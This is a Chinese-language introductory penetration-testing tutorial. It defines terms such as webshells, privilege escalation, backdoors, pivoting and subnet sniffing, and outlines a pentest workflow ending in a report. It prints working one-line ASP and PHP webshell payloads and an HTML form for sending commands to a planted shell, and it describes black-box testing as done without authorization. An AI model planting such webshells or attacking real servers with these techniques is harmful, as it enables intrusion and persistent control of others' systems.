基础知识篇
需要了解的内容:
- 脚本(asp、php、jsp)
- Html(css、js、html)
- http协议
- CMS(B/S)
- MD5
一句话木马:通过向服务端提交一句简短的代码,配合本地客户端实现webshell功能的木马
<%eval request(“pass”)%>
<%execute(request(“pass”))%>
注:request(“pass”)接受客户端提交的数据 pass为执行命令的参数值 eval/execute函数执行客户端命令的内容
如:PHP的一句话木马
<?php evaal($_POST[cracer]);?>
下面的代码可以用POST的方式提交PHP语句,利用PHP脚本的各种函数,就可以实现执行系统命令、修改数据库、增删、改文件等等的各种功能。
<form method=post action=http://木马地址>
<textarea name=cracer>
//这里写php代码
Phpinfo( );
</textarea>
<input type=submit>
</form>
提权:操作系统低权限的账户将自己提升为管理员权限使用的方法。
后门:黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个“入口”。
跳板:使用肉鸡IP来实施攻击的其他目标,以便更好的隐蔽自己的身份信息。
旁站入侵:即同服务器下的网站入侵,入侵之后可以通过提权跨目录手段拿到目标网站的权限。(常见的工具有:WebRobot、御剑、明小子和web在线查询等)
C段入侵:即同C段下服务器入侵,如,目标ip为192.168.1.253,入侵192.168.1.*的任意一台机器然后利用一些黑客工具嗅探获取在网络上传输的各种信息。(常用工具:windows下有Cain,Unix环境下有Sniffit、Snoop、Tcpdump、Dsniff等)
渗透测试
黑盒测试:在未授权的情况下,模拟黑客的攻击方法和思维方式来评估计算机网络系统可能存在着的安全风险。
黑盒测试不同于黑客入侵,并不等于黑站,黑盒测试考验的是综合的能力(OS、Datebase、Script、code、思路、社工)
思维与经验积累往往决定成败。
白盒测试:相对于黑盒测试,白盒测试基本是从内部发起。
黑白盒的另一种说法:知道源代码和不知道源代码的渗透测试。
这时,黑盒测试还是传统的渗透测试,而白盒测试则偏向于代码审计。
流程
- 明确目标
确定范围
确定规则
确定需求
- 信息收集
基础信息
系统信息
应用信息
版本信息
服务信息
人员信息
防护信息
- 漏洞检测
系统漏洞
WebServer漏洞
Web应用漏洞
其他端口服务漏洞
通信安全
- 漏洞验证
自动化验证
手工验证
实验验证
登录猜解
业务漏洞的验证
公开资源的利用
- 信息分析
精准打击
绕过防御机制
定制攻击路径
绕过检测机制
攻击代码
- 获取所需
实施攻击
获取内部信息
进一步渗透
持续性存在*
- 信息整理
整理渗透工具
整理收集信息
整理漏洞信息
- 形成报告
按需整理
补充介绍
修补建议